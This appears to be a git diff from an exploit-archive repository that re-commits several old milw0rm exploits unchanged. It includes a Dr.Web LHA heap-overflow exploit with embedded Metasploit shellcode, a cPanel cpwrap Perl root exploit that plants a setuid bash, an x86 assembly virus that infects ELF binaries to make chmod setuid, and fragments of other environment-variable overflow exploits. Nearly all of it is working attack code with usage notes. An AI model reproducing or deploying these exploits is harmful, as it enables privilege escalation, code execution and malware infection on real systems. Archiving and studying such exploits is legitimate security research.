the - allocator never wrapps around at the end of the address space. - Therefore we can exclude some size values which might appear - here by accident or by "design" from some intruder. - - This thread helped me a lot :-) : - - http://archives.neohapsis.com/archives/dailydave/2006- - q1/thread.html#149 - - - Shellcode took from Metasploit's shellcode generator. - - -- Coded by: - - Jean-Sebastien Guay-Leroux - http://www.guay-leroux.com - -*********************************************************************/ - -#include -#include -#include -#include - -// Base structure of a LHA file -#define I_HEADER_SIZE 0 -#define I_HEADER_CHECKSUM 1 -#define I_METHOD 2 -#define I_PACKED_SIZE 7 -#define I_ORIGINAL_SIZE 11 -#define I_LAST_MODIFIED_STAMP 15 -#define I_ATTRIBUTE 19 -#define I_HEADER_LEVEL 20 -#define I_NAME_LENGTH 21 -#define I_NAME 22 -#define I_CRC 26 -#define I_EXTEND_TYPE 28 - -// Extended structure of a LHA file -#define E_HEADER_SIZE 0 -#define E_HEADER_TYPE 2 -#define E_HEADER_NAME 3 - -#define DEBUG 0 - -unsigned char shellcode1[] = -"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08" -"\x11\x22\xdf\x83\xeb\xfc\xe2\xf4\x62\x1a\x7a\x46\x5a\x77\x4a\xf2" -"\x6b\x98\xc5\xb7\x27\x62\x4a\xdf\x60\x3e\x40\xb6\x66\x98\xc1\x8d" -"\xe0\x19\x22\xdf\x08\x3e\x40\xb6\x66\x3e\x51\xb7\x08\x46\x71\x56" -"\xe9\xdc\xa2\xdf"; - -FILE * open_file (char *filename) { - - FILE *fp; - - fp = fopen ( filename , "w" ); - - if (!fp) { - perror ("Cant open file"); - exit (-1); - } - - return fp; -} - -void put_byte (char *ptr, unsigned char data) { - *ptr = data; -} - -void put_word (char *ptr, unsigned short data) { - put_byte (ptr, data); - put_byte (ptr + 1, data >> 8); -} - -void put_longword (char *ptr, unsigned long data) { - put_byte (ptr, data); - put_byte (ptr + 1, data >> 8); - put_byte (ptr + 2, data >> 16); - put_byte (ptr + 3, data >> 24); -} - -void usage (char *progname) { - - printf ("\nTo use:\n"); - printf ("%s \n\n", progname); - printf ("Example: %s 0x08080114 0x081C63F8 LHA_dir\n\n", - progname); - - exit (-1); -} - -int main (int argc, char *argv[]) { - - FILE *fp; - char *hdr = (char *) malloc (4096), *ptr; - int header_size; - int written_bytes; - int total_size; - unsigned int retloc, retaddr; - char *filename = (char *) malloc (256); - int i; - - if (!hdr) { - perror ("Error allocating memory"); - exit (-1); - } - - if ( argc != 4) { - usage ( argv[0] ); - } - - // parse arguments - sscanf (argv[1], "0x%x", &retloc); - sscanf (argv[2], "0x%x", &retaddr); - strncpy (filename, argv[3], 255); - - memset (hdr, 0, 4096); - - // base header - header_size = 29; - put_byte (hdr + I_HEADER_SIZE, header_size); - put_byte (hdr + I_HEADER_CHECKSUM, 83); - memcpy (hdr + I_METHOD, "-lh0-", 5); // No compression... - put_longword (hdr + I_PACKED_SIZE, 0x1234); - put_longword (hdr + I_ORIGINAL_SIZE, 0x1234); - put_longword (hdr + I_LAST_MODIFIED_STAMP, 0x1234); - put_byte (hdr + I_ATTRIBUTE, 0x20); - put_byte (hdr + I_HEADER_LEVEL, 0x01); - put_byte (hdr + I_NAME_LENGTH, 0x04); - put_longword (hdr + I_NAME, 0x90909090); - put_word (hdr + I_CRC, 0x6666); - put_byte (hdr + I_EXTEND_TYPE, 0x55); // Unix filesystem. - - // extended header - put_word (hdr + header_size + E_HEADER_SIZE, 285); - put_byte (hdr + header_size + E_HEADER_TYPE, 0x2); - - // Build our payload - memset (hdr + header_size + E_HEADER_NAME, 0x41, 266); - for (i = 0, ptr = hdr + header_size + E_HEADER_NAME; i < (240 - - strlen (shellcode1) - 10);) { - ptr[i++] = 0xeb; - ptr[i++] = 0x0a; - } - for (; i < (240 - strlen (shellcode1));) { - ptr[i++]=0x90; - } - memcpy (hdr + header_size + E_HEADER_NAME + 240 - strlen - (shellcode1), shellcode1, strlen(shellcode1)); - - put_longword (hdr + header_size + E_HEADER_NAME + 266, - 0x41414141); - put_longword (hdr + header_size + E_HEADER_NAME + 270, - 0xB7E34CC2); - put_longword (hdr + header_size + E_HEADER_NAME + 274, retloc - - 0xc); - put_longword (hdr + header_size + E_HEADER_NAME + 278, - retaddr); - - // Size of next extended header is 0 - put_word (hdr + header_size + E_HEADER_NAME + 282, 0x0000); - - total_size = (header_size + 284 + E_HEADER_NAME); - - fp = open_file (filename); - - if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) - { - if (DEBUG) printf ("%d bytes written\n", - written_bytes); - } else { - perror ("Cant write to the file\n"); - } - - fclose (fp); - - return 0; -} - -// milw0rm.com [2006-09-20] +/******************************************************************** + +stetoscope.c: +Dr.Web 4.33 antivirus LHA directory name heap overflow for linux + + +- Howto: + + Find a valid GOT entry to hijack with objdump -R /opt/drweb/drweb . + I guess that you can use the address of free(), but my exploit + uses the address of realpath(). There was a NULL byte in the GOT + entry of free() so I had to find something else ;-) + + Calling the exploit will produce a file. Scan this file with a + vulnerable version of drweb and you will, hopefully, get a shell :-) + + Good luck! + + +- Exploit particularities: + + - There is a NOP sled using \xeb\x0a . Increases exploit + reliability + - 0xff and 0x00 are filtered caracters + - Bypass some malloc security checks added in malloc.c: + + Little security check which won't hurt performance: the + allocator never wrapps around at the end of the address space. + Therefore we can exclude some size values which might appear + here by accident or by "design" from some intruder. + + This thread helped me a lot :-) : + + http://archives.neohapsis.com/archives/dailydave/2006- + q1/thread.html#149 + + - Shellcode took from Metasploit's shellcode generator. + + +- Coded by: + + Jean-Sebastien Guay-Leroux + http://www.guay-leroux.com + +*********************************************************************/ + +#include +#include +#include +#include + +// Base structure of a LHA file +#define I_HEADER_SIZE 0 +#define I_HEADER_CHECKSUM 1 +#define I_METHOD 2 +#define I_PACKED_SIZE 7 +#define I_ORIGINAL_SIZE 11 +#define I_LAST_MODIFIED_STAMP 15 +#define I_ATTRIBUTE 19 +#define I_HEADER_LEVEL 20 +#define I_NAME_LENGTH 21 +#define I_NAME 22 +#define I_CRC 26 +#define I_EXTEND_TYPE 28 + +// Extended structure of a LHA file +#define E_HEADER_SIZE 0 +#define E_HEADER_TYPE 2 +#define E_HEADER_NAME 3 + +#define DEBUG 0 + +unsigned char shellcode1[] = +"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08" +"\x11\x22\xdf\x83\xeb\xfc\xe2\xf4\x62\x1a\x7a\x46\x5a\x77\x4a\xf2" +"\x6b\x98\xc5\xb7\x27\x62\x4a\xdf\x60\x3e\x40\xb6\x66\x98\xc1\x8d" +"\xe0\x19\x22\xdf\x08\x3e\x40\xb6\x66\x3e\x51\xb7\x08\x46\x71\x56" +"\xe9\xdc\xa2\xdf"; + +FILE * open_file (char *filename) { + + FILE *fp; + + fp = fopen ( filename , "w" ); + + if (!fp) { + perror ("Cant open file"); + exit (-1); + } + + return fp; +} + +void put_byte (char *ptr, unsigned char data) { + *ptr = data; +} + +void put_word (char *ptr, unsigned short data) { + put_byte (ptr, data); + put_byte (ptr + 1, data >> 8); +} + +void put_longword (char *ptr, unsigned long data) { + put_byte (ptr, data); + put_byte (ptr + 1, data >> 8); + put_byte (ptr + 2, data >> 16); + put_byte (ptr + 3, data >> 24); +} + +void usage (char *progname) { + + printf ("\nTo use:\n"); + printf ("%s \n\n", progname); + printf ("Example: %s 0x08080114 0x081C63F8 LHA_dir\n\n", + progname); + + exit (-1); +} + +int main (int argc, char *argv[]) { + + FILE *fp; + char *hdr = (char *) malloc (4096), *ptr; + int header_size; + int written_bytes; + int total_size; + unsigned int retloc, retaddr; + char *filename = (char *) malloc (256); + int i; + + if (!hdr) { + perror ("Error allocating memory"); + exit (-1); + } + + if ( argc != 4) { + usage ( argv[0] ); + } + + // parse arguments + sscanf (argv[1], "0x%x", &retloc); + sscanf (argv[2], "0x%x", &retaddr); + strncpy (filename, argv[3], 255); + + memset (hdr, 0, 4096); + + // base header + header_size = 29; + put_byte (hdr + I_HEADER_SIZE, header_size); + put_byte (hdr + I_HEADER_CHECKSUM, 83); + memcpy (hdr + I_METHOD, "-lh0-", 5); // No compression... + put_longword (hdr + I_PACKED_SIZE, 0x1234); + put_longword (hdr + I_ORIGINAL_SIZE, 0x1234); + put_longword (hdr + I_LAST_MODIFIED_STAMP, 0x1234); + put_byte (hdr + I_ATTRIBUTE, 0x20); + put_byte (hdr + I_HEADER_LEVEL, 0x01); + put_byte (hdr + I_NAME_LENGTH, 0x04); + put_longword (hdr + I_NAME, 0x90909090); + put_word (hdr + I_CRC, 0x6666); + put_byte (hdr + I_EXTEND_TYPE, 0x55); // Unix filesystem. + + // extended header + put_word (hdr + header_size + E_HEADER_SIZE, 285); + put_byte (hdr + header_size + E_HEADER_TYPE, 0x2); + + // Build our payload + memset (hdr + header_size + E_HEADER_NAME, 0x41, 266); + for (i = 0, ptr = hdr + header_size + E_HEADER_NAME; i < (240 + - strlen (shellcode1) - 10);) { + ptr[i++] = 0xeb; + ptr[i++] = 0x0a; + } + for (; i < (240 - strlen (shellcode1));) { + ptr[i++]=0x90; + } + memcpy (hdr + header_size + E_HEADER_NAME + 240 - strlen + (shellcode1), shellcode1, strlen(shellcode1)); + + put_longword (hdr + header_size + E_HEADER_NAME + 266, + 0x41414141); + put_longword (hdr + header_size + E_HEADER_NAME + 270, + 0xB7E34CC2); + put_longword (hdr + header_size + E_HEADER_NAME + 274, retloc + - 0xc); + put_longword (hdr + header_size + E_HEADER_NAME + 278, + retaddr); + + // Size of next extended header is 0 + put_word (hdr + header_size + E_HEADER_NAME + 282, 0x0000); + + total_size = (header_size + 284 + E_HEADER_NAME); + + fp = open_file (filename); + + if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) + { + if (DEBUG) printf ("%d bytes written\n", + written_bytes); + } else { + perror ("Cant write to the file\n"); + } + + fclose (fp); + + return 0; +} + +// milw0rm.com [2006-09-20] diff --git a/platforms/linux/local/2466.pl b/platforms/linux/local/2466.pl index 6853832a9..981ed9ecf 100755 --- a/platforms/linux/local/2466.pl +++ b/platforms/linux/local/2466.pl @@ -1,41 +1,41 @@ -#!/usr/bin/perl -w - -# 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin -# use strict; # haha oh wait.. - -my $cpwrap = "/usr/local/cpanel/bin/cpwrap"; -my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap"; -my $pwd = `pwd`; - -chomp $pwd; -$ENV{'PERL5LIB'} = "$pwd"; - -if ( ! -x "/usr/bin/gcc" ) { die "gcc: $!\n"; } -if ( ! -x "$cpwrap" ) { die "$cpwrap: $!\n"; } -if ( ! -x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; } - -open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n"; -while() { - if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; } -} -close (CPWRAP); - -open (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n"; -print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n"; -print STRICT "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n"; -print STRICT "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n"; -print STRICT "system(\"/bin/chmod 4755 Maildir\");\n"; -print STRICT "system(\"/bin/rm -f Maildir.c strict.pm\");\n"; -close (STRICT); - -system("$mysqlwrap DUMPMYSQL 2>/dev/null"); - -if ( -e "Maildir" ) { - system("./Maildir"); -} -else { - unlink "strict.pm"; - die "Failed\n"; -} - -# milw0rm.com [2006-10-01] +#!/usr/bin/perl -w + +# 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin +# use strict; # haha oh wait.. + +my $cpwrap = "/usr/local/cpanel/bin/cpwrap"; +my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap"; +my $pwd = `pwd`; + +chomp $pwd; +$ENV{'PERL5LIB'} = "$pwd"; + +if ( ! -x "/usr/bin/gcc" ) { die "gcc: $!\n"; } +if ( ! -x "$cpwrap" ) { die "$cpwrap: $!\n"; } +if ( ! -x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; } + +open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n"; +while() { + if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; } +} +close (CPWRAP); + +open (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n"; +print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n"; +print STRICT "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n"; +print STRICT "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n"; +print STRICT "system(\"/bin/chmod 4755 Maildir\");\n"; +print STRICT "system(\"/bin/rm -f Maildir.c strict.pm\");\n"; +close (STRICT); + +system("$mysqlwrap DUMPMYSQL 2>/dev/null"); + +if ( -e "Maildir" ) { + system("./Maildir"); +} +else { + unlink "strict.pm"; + die "Failed\n"; +} + +# milw0rm.com [2006-10-01] diff --git a/platforms/linux/local/249.c b/platforms/linux/local/249.c index ad668a3e6..60c0b2ab0 100755 --- a/platforms/linux/local/249.c +++ b/platforms/linux/local/249.c @@ -560,6 +560,6 @@ void search_valid_language() printf("failed to find a valid language\naborting\n"); exit(0); } - - -// milw0rm.com [2003-01-15] + + +// milw0rm.com [2003-01-15] diff --git a/platforms/linux/local/2492.s b/platforms/linux/local/2492.s index e9dce81b4..568f1e55f 100755 --- a/platforms/linux/local/2492.s +++ b/platforms/linux/local/2492.s @@ -1,329 +1,329 @@ -# gcc infR3.s -o infR3 -# strip infR3 -# find a writable binary (example: ls) -# ./infR3 /bin/ls -# when root calls the writable ls, chmod will be setuided -# Coded by jolmos@7a69ezine.org == sha0@BadCheckSum.com - -.text -.global main - # infeccion de _start para conseguir local root - # use at your own risk - # - # Coded by jolmos@7a69ezine.org == sha0@BadCheckSum.com - # - # GPLv2 -main: - push %ebp - movl %esp, %ebp - subl $500, %esp #si el codigo del bicho es mas grande, habra k ampliar este buffer - -get_param: - movl 0x0c(%ebp), %eax - movl 4(%eax), %ebx # ebx -> argv[1] - -open_host: - movl $5, %eax - movl $2, %ecx - int $0x80 - movl %eax, -4(%ebp) # descriptor en -4 - -calc_len: - movl $19, %eax - movl -4(%ebp), %ebx - xorl %ecx, %ecx - movl $2, %edx - int $0x80 - movl %eax, -8(%ebp) # longitud del host en -8 - -mapeo: - movl $90, %eax - xorl %ecx, %ecx - pushl %ecx # offset 0 - pushl -4(%ebp) # descriptor - pushl $1 # privado 0x22 - pushl $3 # read|write 0x07 - pushl -8(%ebp) # size - pushl %ecx # nulo, para que nos indique mmap donde. - movl %esp, %ebx - int $0x80 - cmp $0xfffff000, %eax - jbe ident - - # error en el mapa - jmp ending - -ident: - movl %eax, -12(%ebp) # -12 -> VA del mapa - # eax -> VA del mapa - - cmpl $0x464c457f, (%eax) # es elf? - jne not_elf - cmpb $0x02, 0x10(%eax) # es ejecutable? - jne not_elf - cmpl $0xde, 0x07(%eax) # comprobar si ya ha sido infectado - je not_elf - - movl $0xde, 0x07(%eax) # Marca de infeccion - -guarda_init: - movl $end_vir, %ecx - #addl $5, %ecx - subl $start_vir, %ecx - movl %ecx,-16(%ebp) # -16 -> size del virus + 5 - # ecx -> size del virus + 5 - - leal -500(%ebp), %edi # edi -> -500 - movl 0x18(%eax), %esi # esi -> RVA e_entry - movl 0x2c(%eax), %ecx # Numero de PH's (e_phnum) (cuenta atras) - -primer_ph: - movl 0x1c(%eax), %edx # edx -> RVA e_phoff - addl %eax, %edx # edx -> VA e_phoff - -busca_ph: - cmpl %esi, 0x08(%edx) # if e_entry > p_vaddr => siguiente PH - jna destino - -siguiente_ph: - addl 0x2a(%edx), %edx - loop busca_ph - - -destino: ######### LA CLAVE DE TODO ########## - subl 0x08(%edx), %esi # esi -> RVA e_entry-p_vaddr - addl 0x04(%edx), %esi # esi -> RVA e_entry-p_vaddr+p_offset - #addl $0x34, %esi # alineacion #subl $0x30 -> _init - #addl $0x34 -> _start (p_offset) - #subl $0x65, %esi - addl %eax, %esi # esi -> VA e_entry-p_vaddr+p_offset - movl %esi, %edx - -salvo_start: - movl -16(%ebp), %ecx # virus size - rep movsb # copiando _start en -400 - -guarda_virus: - movl %edx, %edi # edi -> VA del entry point - movl $start_vir, %esi # esi -> VA del inicio del virus - movl -16(%ebp), %ecx # ecx -> size del virus - rep movsb - - jmp sincroniza - -not_elf: - movl $4, %eax - movl $1, %ebx - movl $notelf, %ecx - movl $28, %edx - int $0x80 - -sincroniza: - movl %eax, %ebx # ebx -> mapa - movl $144, %eax # eax -> msync - movl -8(%ebp),%ecx # ecx -> size del mapa - movl $2, %edx # edx -> flags - int $0x80 - -desmapea: - movl $91, %eax - movl -12(%ebp), %ebx # VA inicial del mapa - movl -8(%ebp), %ecx # size del mapa - int $0x80 - -seek_end: - movl $19, %eax # lseek - movl -4(%ebp), %ebx - xorl %ecx, %ecx - movl $2, %edx # SEEK_END - int $0x80 -write: - movl $4, %eax - movl -4(%ebp), %ebx - leal -500(%ebp), %ecx - movl -16(%ebp), %edx - int $0x80 - -cierra_host: - movl $6, %eax - movl -4(%ebp), %ebx - int $0x80 - -utime: - #movl $30, %eax - #int $0x80 - - -ending: - movl $6, %eax - int $0x80 - - leave - ret - -###################################################################### -start_vir: - pushal # backup de 0x20 bytes - subl $400, %esp # espacio de pila de 400 bytes (total 0x1b0 bytes 0x1b0 + 4 = 0x1b4(%esp)) - - call delta # ebp -> delta offset -delta: - popl %ebp - subl $delta, %ebp - -payload_code: ##### PAYLOAD ##### - -soy_root: - movl $0x18, %eax - int $0x80 #__NR_getuid - test %eax, %eax - -no_pues_fuera: - jnz end_payload_code - -setuidar: - movl $0x0f, %eax - leal shushi(%ebp), %ebx - movl $04755, %ecx - int $0x80 # __NR_chmod - - -end_payload_code: ###################### - -calcula_nombre_host: - movl $1,%edx # edx -> length del nombre de host - movl 0x1b4(%esp), %edi # edi -> addr del inicio del nombre del huesped - xorl %ebx, %ebx - movl $9900, %ecx - -busca_path: - cmpl %ebx, (%edi) - je path_encontrado - - incl %edi - loop busca_path - - -path_encontrado: - movl $100, %ecx - decl %edi - -situa_inicio_nombre: - cmpb %bl, (%edi) - je nombre_ok - - decl %edi - loop situa_inicio_nombre - - -nombre_ok: - incl %edi - -desproteger_host: - movl $125, %eax # mprotect - leal start_vir(%ebp), %ebx - andl $0xfffff000, %ebx # pagina del bicho - movl $2000, %ecx # 2 paginas a desproteger - movl $7, %edx # rwx - int $0x80 # ahora ya tengo w ya puedo poner encima - # el codigo correcto de _start -desproteger_pila: - movl $125, %eax # mprotect - movl %esp, %ebx - andl $0xfffff000, %ebx # pagina de pila - int $0x80 # - - -reconstruye_host: - movl $5, %eax # open - movl %edi, %ebx # argv[0] - xorl %ecx, %ecx # solo me puedo abrir a mi mismo en modo 0 - int $0x80 # (O_RDONLY) - - movl $end_vir, %esi # final-inicio+variable del final - subl $start_vir, %esi # esi -> virus length - - xorl %ecx, %ecx - movl %eax, %ebx # descriptor host - movl $19, %eax # lseek - movl $2, %edx # SEEK_END - int $0x80 # nos situamos al final del host-virsize - movl %eax, %edi # edi -> tamanyo del host - - pushl %ecx # offset: todo el file desde el inicio - pushl %ebx # descriptor - pushl $1 # mapa privado - pushl $1 # solo lectura (el descriptor esta modo 0) - pushl %eax # mapeamos todo el file - pushl %ecx # que me de el la address - movl $90, %eax - movl %esp, %ebx - int $0x80 - cmp $0xfffff000, %eax - jbe reconstruye - - int $3 # mapa incorrecto - -reconstruye: - addl %edi, %eax # eax -> final del mapa - subl %esi, %eax # eax -> inicio del saved _start - - movl %esi, virisize(%ebp) - movl %eax, savedstart(%ebp) - - movl $fin_paranoia, %ecx # como que no me puedo borrar a mi - subl $paranoia, %ecx # mismo, porque perderia la ejecucion - leal paranoia(%ebp), %esi # copio el codigo de borrado a otro - movl %esp, %edi # area de memoria y desvio la ejecucion - rep movsb # ahi. - jmp *%esp - -paranoia: - movl virisize(%ebp), %ecx - movl savedstart(%ebp), %esi # optimizable - leal start_vir(%ebp), %edi - rep movsb - -proteger_host: - movl $125, %eax # mprotect - leal start_vir(%ebp), %ebx - andl $0xfffff000, %ebx # pagina del bicho - movl $2000, %ecx # 2 paginas a desproteger - movl $5, %edx # r-x - int $0x80 # ahora ya tengo w ya puedo poner encima - # el codigo correcto de _start -proteger_pila: - movl $125, %eax # mprotect - movl %esp, %ebx - andl $0xfffff000, %ebx # pagina de pila - movl $6, %edx # rw- - int $0x80 # - - movl $6, %eax # close - int $0x80 # ebx descriptor - - - leal start_vir(%ebp), %eax - addl $424, %esp # ok - movl %eax, 8(%esp) # ok (en el saved ebp) - popal - jmp *%ebp - - -fin_paranoia: - -virisize: - .long 0x00000000 -savedstart: - .long 0x00000000 -shushi: - .string "/bin/chmod\0" - -end_vir: -####################################################################### - -notelf: - .string "NOT ELF OR INFECTED YET!!!\n\0" -fin: - -# milw0rm.com [2006-10-08] +# gcc infR3.s -o infR3 +# strip infR3 +# find a writable binary (example: ls) +# ./infR3 /bin/ls +# when root calls the writable ls, chmod will be setuided +# Coded by jolmos@7a69ezine.org == sha0@BadCheckSum.com + +.text +.global main + # infeccion de _start para conseguir local root + # use at your own risk + # + # Coded by jolmos@7a69ezine.org == sha0@BadCheckSum.com + # + # GPLv2 +main: + push %ebp + movl %esp, %ebp + subl $500, %esp #si el codigo del bicho es mas grande, habra k ampliar este buffer + +get_param: + movl 0x0c(%ebp), %eax + movl 4(%eax), %ebx # ebx -> argv[1] + +open_host: + movl $5, %eax + movl $2, %ecx + int $0x80 + movl %eax, -4(%ebp) # descriptor en -4 + +calc_len: + movl $19, %eax + movl -4(%ebp), %ebx + xorl %ecx, %ecx + movl $2, %edx + int $0x80 + movl %eax, -8(%ebp) # longitud del host en -8 + +mapeo: + movl $90, %eax + xorl %ecx, %ecx + pushl %ecx # offset 0 + pushl -4(%ebp) # descriptor + pushl $1 # privado 0x22 + pushl $3 # read|write 0x07 + pushl -8(%ebp) # size + pushl %ecx # nulo, para que nos indique mmap donde. + movl %esp, %ebx + int $0x80 + cmp $0xfffff000, %eax + jbe ident + + # error en el mapa + jmp ending + +ident: + movl %eax, -12(%ebp) # -12 -> VA del mapa + # eax -> VA del mapa + + cmpl $0x464c457f, (%eax) # es elf? + jne not_elf + cmpb $0x02, 0x10(%eax) # es ejecutable? + jne not_elf + cmpl $0xde, 0x07(%eax) # comprobar si ya ha sido infectado + je not_elf + + movl $0xde, 0x07(%eax) # Marca de infeccion + +guarda_init: + movl $end_vir, %ecx + #addl $5, %ecx + subl $start_vir, %ecx + movl %ecx,-16(%ebp) # -16 -> size del virus + 5 + # ecx -> size del virus + 5 + + leal -500(%ebp), %edi # edi -> -500 + movl 0x18(%eax), %esi # esi -> RVA e_entry + movl 0x2c(%eax), %ecx # Numero de PH's (e_phnum) (cuenta atras) + +primer_ph: + movl 0x1c(%eax), %edx # edx -> RVA e_phoff + addl %eax, %edx # edx -> VA e_phoff + +busca_ph: + cmpl %esi, 0x08(%edx) # if e_entry > p_vaddr => siguiente PH + jna destino + +siguiente_ph: + addl 0x2a(%edx), %edx + loop busca_ph + + +destino: ######### LA CLAVE DE TODO ########## + subl 0x08(%edx), %esi # esi -> RVA e_entry-p_vaddr + addl 0x04(%edx), %esi # esi -> RVA e_entry-p_vaddr+p_offset + #addl $0x34, %esi # alineacion #subl $0x30 -> _init + #addl $0x34 -> _start (p_offset) + #subl $0x65, %esi + addl %eax, %esi # esi -> VA e_entry-p_vaddr+p_offset + movl %esi, %edx + +salvo_start: + movl -16(%ebp), %ecx # virus size + rep movsb # copiando _start en -400 + +guarda_virus: + movl %edx, %edi # edi -> VA del entry point + movl $start_vir, %esi # esi -> VA del inicio del virus + movl -16(%ebp), %ecx # ecx -> size del virus + rep movsb + + jmp sincroniza + +not_elf: + movl $4, %eax + movl $1, %ebx + movl $notelf, %ecx + movl $28, %edx + int $0x80 + +sincroniza: + movl %eax, %ebx # ebx -> mapa + movl $144, %eax # eax -> msync + movl -8(%ebp),%ecx # ecx -> size del mapa + movl $2, %edx # edx -> flags + int $0x80 + +desmapea: + movl $91, %eax + movl -12(%ebp), %ebx # VA inicial del mapa + movl -8(%ebp), %ecx # size del mapa + int $0x80 + +seek_end: + movl $19, %eax # lseek + movl -4(%ebp), %ebx + xorl %ecx, %ecx + movl $2, %edx # SEEK_END + int $0x80 +write: + movl $4, %eax + movl -4(%ebp), %ebx + leal -500(%ebp), %ecx + movl -16(%ebp), %edx + int $0x80 + +cierra_host: + movl $6, %eax + movl -4(%ebp), %ebx + int $0x80 + +utime: + #movl $30, %eax + #int $0x80 + + +ending: + movl $6, %eax + int $0x80 + + leave + ret + +###################################################################### +start_vir: + pushal # backup de 0x20 bytes + subl $400, %esp # espacio de pila de 400 bytes (total 0x1b0 bytes 0x1b0 + 4 = 0x1b4(%esp)) + + call delta # ebp -> delta offset +delta: + popl %ebp + subl $delta, %ebp + +payload_code: ##### PAYLOAD ##### + +soy_root: + movl $0x18, %eax + int $0x80 #__NR_getuid + test %eax, %eax + +no_pues_fuera: + jnz end_payload_code + +setuidar: + movl $0x0f, %eax + leal shushi(%ebp), %ebx + movl $04755, %ecx + int $0x80 # __NR_chmod + + +end_payload_code: ###################### + +calcula_nombre_host: + movl $1,%edx # edx -> length del nombre de host + movl 0x1b4(%esp), %edi # edi -> addr del inicio del nombre del huesped + xorl %ebx, %ebx + movl $9900, %ecx + +busca_path: + cmpl %ebx, (%edi) + je path_encontrado + + incl %edi + loop busca_path + + +path_encontrado: + movl $100, %ecx + decl %edi + +situa_inicio_nombre: + cmpb %bl, (%edi) + je nombre_ok + + decl %edi + loop situa_inicio_nombre + + +nombre_ok: + incl %edi + +desproteger_host: + movl $125, %eax # mprotect + leal start_vir(%ebp), %ebx + andl $0xfffff000, %ebx # pagina del bicho + movl $2000, %ecx # 2 paginas a desproteger + movl $7, %edx # rwx + int $0x80 # ahora ya tengo w ya puedo poner encima + # el codigo correcto de _start +desproteger_pila: + movl $125, %eax # mprotect + movl %esp, %ebx + andl $0xfffff000, %ebx # pagina de pila + int $0x80 # + + +reconstruye_host: + movl $5, %eax # open + movl %edi, %ebx # argv[0] + xorl %ecx, %ecx # solo me puedo abrir a mi mismo en modo 0 + int $0x80 # (O_RDONLY) + + movl $end_vir, %esi # final-inicio+variable del final + subl $start_vir, %esi # esi -> virus length + + xorl %ecx, %ecx + movl %eax, %ebx # descriptor host + movl $19, %eax # lseek + movl $2, %edx # SEEK_END + int $0x80 # nos situamos al final del host-virsize + movl %eax, %edi # edi -> tamanyo del host + + pushl %ecx # offset: todo el file desde el inicio + pushl %ebx # descriptor + pushl $1 # mapa privado + pushl $1 # solo lectura (el descriptor esta modo 0) + pushl %eax # mapeamos todo el file + pushl %ecx # que me de el la address + movl $90, %eax + movl %esp, %ebx + int $0x80 + cmp $0xfffff000, %eax + jbe reconstruye + + int $3 # mapa incorrecto + +reconstruye: + addl %edi, %eax # eax -> final del mapa + subl %esi, %eax # eax -> inicio del saved _start + + movl %esi, virisize(%ebp) + movl %eax, savedstart(%ebp) + + movl $fin_paranoia, %ecx # como que no me puedo borrar a mi + subl $paranoia, %ecx # mismo, porque perderia la ejecucion + leal paranoia(%ebp), %esi # copio el codigo de borrado a otro + movl %esp, %edi # area de memoria y desvio la ejecucion + rep movsb # ahi. + jmp *%esp + +paranoia: + movl virisize(%ebp), %ecx + movl savedstart(%ebp), %esi # optimizable + leal start_vir(%ebp), %edi + rep movsb + +proteger_host: + movl $125, %eax # mprotect + leal start_vir(%ebp), %ebx + andl $0xfffff000, %ebx # pagina del bicho + movl $2000, %ecx # 2 paginas a desproteger + movl $5, %edx # r-x + int $0x80 # ahora ya tengo w ya puedo poner encima + # el codigo correcto de _start +proteger_pila: + movl $125, %eax # mprotect + movl %esp, %ebx + andl $0xfffff000, %ebx # pagina de pila + movl $6, %edx # rw- + int $0x80 # + + movl $6, %eax # close + int $0x80 # ebx descriptor + + + leal start_vir(%ebp), %eax + addl $424, %esp # ok + movl %eax, 8(%esp) # ok (en el saved ebp) + popal + jmp *%ebp + + +fin_paranoia: + +virisize: + .long 0x00000000 +savedstart: + .long 0x00000000 +shushi: + .string "/bin/chmod\0" + +end_vir: +####################################################################### + +notelf: + .string "NOT ELF OR INFECTED YET!!!\n\0" +fin: + +# milw0rm.com [2006-10-08] diff --git a/platforms/linux/local/255.pl b/platforms/linux/local/255.pl index a00fde2d0..89f5dbd76 100755 --- a/platforms/linux/local/255.pl +++ b/platforms/linux/local/255.pl @@ -47,6 +47,6 @@ for ($i += length($shellcode); $i < $len; $i += 4) { # [ Buffer: NNNNNNNNNNNNNNNNSSSSSRRRRRR ] local($ENV{'MANPAGER'}) = $buffer; exec("/usr/bin/man id"); - - -# milw0rm.com [2001-01-19] + + +# milw0rm.com [2001-01-19] diff --git a/platforms/linux/local/257.pl b/platforms/linux/local/257.pl index 0587e07bd..8fe181d32 100755 --- a/platforms/linux/local/257.pl +++ b/platforms/linux/local/257.pl @@ -59,6 +59,6 @@ if ($ENV{'DISPLAY'}) { local($ENV{'DISPLAY'}) = $buffer; exec("/usr/X11R6/bin/jazip"); - - -# milw0rm.com [2001-01-25] + + +# milw0rm.com [2001-01-25] diff --git a/platforms/linux/local/2581.c b/platforms/linux/local/2581.c index 06661189b..58e779c55 100755 --- a/platforms/linux/local/2581.c +++ b/platforms/linux/local/2581.c @@ -1,344 +1,344 @@ -/* - * Copyright (c) 2005 Matthieu Herrb - * Copyright (c) 2006 Derek Abdine, Marc Bevand - * - * Permission to use, copy, modify, and distribute this software for any 